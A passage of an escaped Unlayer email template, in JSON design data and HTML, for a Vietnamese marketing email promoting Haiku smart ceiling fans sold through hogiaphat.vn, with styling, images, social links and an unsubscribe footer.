B\\u00e1n H\\u00e0ng: 0962731418 (Ms.Loan)<\\/span>\\\",\\\"calculatedWidth\\\":306,\\\"calculatedHeight\\\":37}},{\\\"id\\\":\\\"dGNFP6u5tP\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/www.facebook.com\\/hogiaphatvn\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\"https:\\/\\/www.linkedin.com\\/company\\/hogiaphat\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/hgpco\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"name\\\":\\\"YouTube\\\",\\\"url\\\":\\\"https:\\/\\/www.youtube.com\\/channel\\/UCKlFoDwgsjdlMD9gxwQYPVw\\\"},{\\\"name\\\":\\\"Instagram\\\",\\\"url\\\":\\\"https:\\/\\/www.instagram.com\\/quatcaocap\\/\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":5,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"INMPXUgyFl\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 15px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_35\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5 \\u0111\\u1ed9 C, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"cHUf919bht\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 22px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"170%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_36\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\">\\u00a9 Tổ chức đào tạo WIT Technology | All Rights Reserve.\\u00a0<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"%unsubscribe_url%\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6IiV1bnN1YnNjcmliZV91cmwlIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\\\\\">Unsubscribe<\\/span><\\/a>\\u00a0 here<\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_23\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_17\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Rubik\\\",\\\"value\\\":\\\"\'Rubik\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Rubik:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-32 {\\r\\n    width: 192px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-48p17 {\\r\\n    width: 289.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-49p83 {\\r\\n    width: 298.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50p17 {\\r\\n    width: 301.02px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-51p83 {\\r\\n    width: 310.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-68 {\\r\\n    width: 408px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) {\\r\\n  .hide-mobile {\\r\\n    max-height: 0px;\\r\\n    overflow: hidden;\\r\\n    display: none !important;\\r\\n  }\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) { #u_content_text_1 .v-text-align { text-align: center !important; } #u_content_text_2 .v-text-align { text-align: center !important; } #u_content_text_5 .v-text-align { text-align: center !important; } #u_content_button_1 .v-text-align { text-align: center !important; } #u_content_menu_1 .v-layout-display { display: block !important; } #u_content_menu_1 .v-padding { padding: 8px 8px 5px !important; } #u_content_text_4 .v-text-align { text-align: center !important; } #u_content_text_deprecated_8 .v-text-align { text-align: center !important; } #u_content_text_deprecated_1 .v-text-align { text-align: center !important; } #u_content_text_13 .v-text-align { text-align: center !important; } #u_content_text_deprecated_5 .v-text-align { text-align: center !important; } #u_content_button_3 .v-text-align { text-align: center !important; } #u_content_text_9 .v-text-align { text-align: center !important; } #u_content_text_10 .v-text-align { text-align: center !important; } #u_content_text_11 .v-text-align { text-align: center !important; } #u_content_button_2 .v-text-align { text-align: center !important; } #u_content_text_deprecated_9 .v-text-align { text-align: center !important; } #u_content_text_deprecated_10 .v-text-align { text-align: center !important; } #u_content_text_deprecated_11 .v-text-align { text-align: center !important; } #u_content_button_11 .v-text-align { text-align: center !important; } #u_content_text_deprecated_12 .v-text-align { text-align: center !important; } #u_content_text_deprecated_13 .v-text-align { text-align: center !important; } #u_content_text_deprecated_14 .v-text-align { text-align: center !important; } #u_content_button_12 .v-text-align { text-align: center !important; } #u_content_text_deprecated_15 .v-text-align { text-align: center !important; } #u_content_text_deprecated_16 .v-text-align { text-align: center !important; } #u_content_text_deprecated_17 .v-text-align { text-align: center !important; } #u_content_button_13 .v-text-align { text-align: center !important; } #u_content_text_deprecated_18 .v-text-align { text-align: center !important; } #u_content_text_deprecated_19 .v-text-align { text-align: center !important; } #u_content_text_deprecated_20 .v-text-align { text-align: center !important; } #u_content_button_14 .v-text-align { text-align: center !important; } #u_content_button_5 .v-text-align { text-align: center !important; } #u_content_text_15 .v-text-align { text-align: center !important; } #u_content_text_16 .v-text-align { text-align: center !important; } #u_content_button_9 .v-text-align { text-align: center !important; } #u_content_text_27 .v-text-align { text-align: center !important; } #u_content_text_28 .v-text-align { text-align: center !important; } #u_content_button_7 .v-text-align { text-align: center !important; } #u_content_text_35 .v-text-align { text-align: center !important; } #u_content_text_36 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Rubik:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f5f5f5;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f5f5f5;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #f5f5f5;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765403006-LOGO.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 0px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765991818-Haiku-I.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 300px;\\\" width=\\\"300\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:5px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f1c40f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1ea1i Hoa K\\u1ef3.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_2\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 40px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi ch\\u1ebf \\u0111\\u1ed9 Haiku Fan-Eco mang l\\u1ea1i hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi nh\\u1edd s\\u1ef1 ti\\u1ec7n l\\u1ee3i c\\u1ee7a thi\\u1ebft b\\u1ecb di \\u0111\\u1ed9ng c\\u1ee7a b\\u1ea1n. Fan Eco mang \\u0111\\u1ebfn kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng ch\\u01b0a t\\u1eebng c\\u00f3 v\\u1edbi lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u00e0m m\\u00e1t h\\u00e0i h\\u00f2a v\\u00e0 ho\\u00e0n h\\u1ea3o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" style=\\\"height:33px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#db1908\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #db1908; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:8px 25px 8px 24px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM 